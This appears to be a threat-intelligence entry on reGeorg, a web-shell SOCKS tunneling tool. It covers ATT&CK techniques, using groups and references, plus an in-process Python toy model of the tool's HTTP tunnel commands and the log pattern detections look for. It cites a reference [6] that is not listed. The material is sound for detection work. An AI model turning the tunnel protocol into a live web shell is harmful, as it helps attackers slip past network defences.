S1187 reGeorg
reGeorg is an open-source tunneling tool built around a web shell: a small server-side script dropped on a compromised web server, driven by a Python client that exposes it as a SOCKS proxy, so an attacker can bypass firewall rules and tunnel data in and out of targeted networks over ordinary HTTP(S).[1][2]
| Item | Value |
|---|---|
| ID | S1187 |
| Associated Names | |
| Type | MALWARE |
| Version | 1.0 |
| Created | 06 January 2025 |
| Last Modified | 15 April 2025 |
Techniques Used
| Domain | ID | Name | Use |
|---|---|---|---|
| enterprise | T1071 | Application Layer Protocol | - |
| enterprise | T1071.001 | Web Protocols | reGeorg can use HTTP to tunnel connections in and out of targeted networks.[1] |
| enterprise | T1059 | Command and Scripting Interpreter | - |
| enterprise | T1059.006 | Python | reGeorg is a Python-based web shell.[2] |
| enterprise | T1105 | Ingress Tool Transfer | reGeorg has the ability to download files to targeted systems.[5] |
| enterprise | T1095 | Non-Application Layer Protocol | reGeorg can tunnel TCP sessions into targeted networks.[1] |
| enterprise | T1572 | Protocol Tunneling | reGeorg can tunnel TCP sessions, including RDP, SSH, and SMB, through HTTP.[1][3][4] |
| enterprise | T1090 | Proxy | reGeorg can establish an HTTP or SOCKS proxy to tunnel data in and out of a network.[2][1][3] |
| enterprise | T1021 | Remote Services | - |
| enterprise | T1021.001 | Remote Desktop Protocol | reGeorg can be used to tunnel RDP connections.[1] |
| enterprise | T1021.002 | SMB/Windows Admin Shares | reGeorg has the ability to tunnel SMB sessions.[1] |
| enterprise | T1021.004 | SSH | reGeorg can communicate using SSH through an HTTP tunnel.[1] |
| enterprise | T1505 | Server Software Component | - |
| enterprise | T1505.003 | Web Shell | reGeorg is a web shell that has been installed on exposed web servers for access to victim environments.[3][4] |
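The entry above describes the mechanism (a script on the web server carries TCP sessions inside HTTP requests, and the attacker drives it through a local SOCKS proxy) but not how the two ends talk. The following is an added example written for this page, not code from the reGeorg project: a toy model of a reGeorg-style tunnel with both ends in one process. The command vocabulary (an `X-CMD` header carrying `CONNECT`, `FORWARD`, `READ` or `DISCONNECT`, with `X-TARGET`/`X-PORT` on connect and `X-STATUS` in the reply) is modelled on the public tunnel scripts and should be treated as an assumption; the internal "SSH" host, the banner and all traffic are constructed. It illustrates the T1572 and T1090 rows: the client never opens a socket to the internal host itself, it only ever sends HTTP to the web shell.

```python
"""Toy model of a reGeorg-style HTTP tunnel with both ends in one process.

Added example for this ATT&CK entry, not code from the reGeorg project. The
header names (X-CMD/X-TARGET/X-PORT/X-STATUS) are an assumption modelled on
the public tunnel scripts; the internal service and traffic are constructed.
"""
from dataclasses import dataclass
from itertools import count


@dataclass
class HttpMessage:
    headers: dict
    body: bytes = b""


class FakeInternalService:
    # Constructed stand-in for a host reachable only from the web server.
    def __init__(self, banner: bytes):
        self._out = banner            # bytes the peer can read next
        self.closed = False

    def send(self, data: bytes) -> None:
        self._out += b"echo:" + data  # constructed behaviour: echo input back

    def recv(self) -> bytes:
        data, self._out = self._out, b""
        return data

    def close(self) -> None:
        self.closed = True


class TunnelScript:
    """Server side: what the dropped tunnel script does on each HTTP request."""

    def __init__(self, connect):
        self._connect = connect       # callable(host, port) -> socket-like object
        self._sessions = {}           # session cookie -> open socket
        self._ids = count(1)

    def handle(self, req: HttpMessage) -> HttpMessage:
        cmd = req.headers.get("X-CMD")
        if cmd is None:               # bare GET: the client's initial health check
            return HttpMessage({}, b"Georg says, 'All seems fine'")
        if cmd == "CONNECT":          # open a TCP socket from the web server outward
            sid = f"s{next(self._ids)}"
            self._sessions[sid] = self._connect(req.headers["X-TARGET"], int(req.headers["X-PORT"]))
            return HttpMessage({"X-STATUS": "OK", "Set-Cookie": sid})
        sock = self._sessions.get(req.headers.get("Cookie"))
        if sock is None:
            return HttpMessage({"X-STATUS": "FAIL", "X-ERROR": "no session"})
        if cmd == "FORWARD":          # request body -> internal host
            sock.send(req.body)
            return HttpMessage({"X-STATUS": "OK"})
        if cmd == "READ":             # internal host -> response body (client polls)
            return HttpMessage({"X-STATUS": "OK"}, sock.recv())
        if cmd == "DISCONNECT":
            sock.close()
            del self._sessions[req.headers["Cookie"]]
            return HttpMessage({"X-STATUS": "OK"})
        return HttpMessage({"X-STATUS": "FAIL", "X-ERROR": "unknown command"})


class TunnelClient:
    """Attacker side: what the local SOCKS proxy drives for one TCP connection."""

    def __init__(self, script: TunnelScript, path: str = "/tunnel.php"):
        self._script, self._path = script, path
        self.log = []                 # (method, path, X-CMD), as a web log would show it

    def _call(self, method: str, headers: dict, body: bytes = b"") -> HttpMessage:
        self.log.append((method, self._path, headers.get("X-CMD")))
        return self._script.handle(HttpMessage(headers, body))

    def check(self) -> bool:
        return b"All seems fine" in self._call("GET", {}).body

    def connect(self, host: str, port: int) -> str:
        resp = self._call("POST", {"X-CMD": "CONNECT", "X-TARGET": host, "X-PORT": str(port)})
        if resp.headers.get("X-STATUS") != "OK":
            raise ConnectionError(resp.headers.get("X-ERROR"))
        return resp.headers["Set-Cookie"]

    def send(self, sid: str, data: bytes) -> None:
        self._call("POST", {"X-CMD": "FORWARD", "Cookie": sid}, data)

    def recv(self, sid: str) -> bytes:
        return self._call("POST", {"X-CMD": "READ", "Cookie": sid}).body

    def close(self, sid: str) -> None:
        self._call("POST", {"X-CMD": "DISCONNECT", "Cookie": sid})


def tunnel_demo() -> dict:
    """One tunnelled session to a constructed internal SSH host; returns what was seen."""
    script = TunnelScript(lambda host, port: FakeInternalService(b"SSH-2.0-OpenSSH_9.6"))
    client = TunnelClient(script)
    healthy = client.check()
    sid = client.connect("10.0.0.5", 22)
    banner = client.recv(sid)
    client.send(sid, b"hello")
    echo = client.recv(sid)
    client.close(sid)
    return {"healthy": healthy, "banner": banner, "echo": echo,
            "commands": [c for _, _, c in client.log]}
```

Running `tunnel_demo()` returns the SSH banner and the echoed payload exactly as a direct connection would, while `commands` shows the only thing the web server's access log sees: one GET followed by a run of POSTs to a single script path (`[None, 'CONNECT', 'READ', 'FORWARD', 'READ', 'DISCONNECT']`). That shape, many small POSTs to one script from one client, with the same small set of non-standard request headers, is what the FortiGuard signature cited on this page and similar detections key on.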
Groups That Use This Software
| ID | Name | References |
|---|---|---|
| G0016 | APT29 | [3] |
| G1003 | Ember Bear | [4] |
| G0007 | APT28 | [6] |
References
1. FortiGuard Labs. (2019, March 12). ReGeorg.HTTP.Tunnel. Retrieved December 3, 2024.
2. xl7dev. (2016). reGeorg-master. Retrieved December 3, 2024.
3. Mandiant. (2022, May 2). UNC3524: Eye Spy on Your Email. Retrieved August 17, 2023.
4. Microsoft Threat Intelligence. (2023, June 14). Cadet Blizzard emerges as a novel and distinct Russian threat actor. Retrieved July 10, 2023.
5. Paganini, P. (2023, October 27). France agency ANSSI warns of Russia-linked APT28 attacks on French entities. Retrieved December 3, 2024.